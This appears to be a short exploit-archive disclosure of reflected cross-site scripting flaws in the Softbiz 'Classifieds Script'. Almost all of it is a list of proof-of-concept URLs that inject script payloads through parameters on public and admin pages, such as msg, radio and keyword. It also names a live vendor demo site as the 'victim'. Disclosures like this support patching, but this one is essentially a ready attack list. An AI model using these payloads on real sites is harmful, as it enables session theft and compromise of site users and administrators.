######################################################### --------------------------------------------------------- Portal Name: Classifieds Script Vendor : http://www.softbizscripts.com/online-classifieds-script-features.php Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : (XSS) --------------------------------------------------------- ######################################################### [XSS]: http://www.site.com/[Path]/showcategory.php?cid=9&type=1&keyword=Pouya&radio=>">alert(1369)%3B http://www.site.com/[Path]/advertisers/signinform.php?msg=alert(455695710637)%3B&show_form=no http://www.site.com/[Path]/gallery.php?type=2&keyword=111-222-1933email@address.tst&radio=>">alert(436145568828)%3B&cid=0 http://www.site.com/[Path]/lostpassword.php?msg=alert(434915558474)%3B http://www.site.com/[Path]/showcategory.php?cid=9&type=1&keyword=111-222-1933email@address.tst&radio=>">alert(398524956207)%3B http://www.site.com/[Path]/signinform.php?msg=&pid=0 http://www.site.com/[Path]/admin/adminhome.php?tmp=1&msg=alert(477365890784)%3B http://www.site.com/[Path]/admin/index.php?msg=alert(476295881324)%3B --------------------------------- Victem : http://www.softbizscripts.com/scripts/classified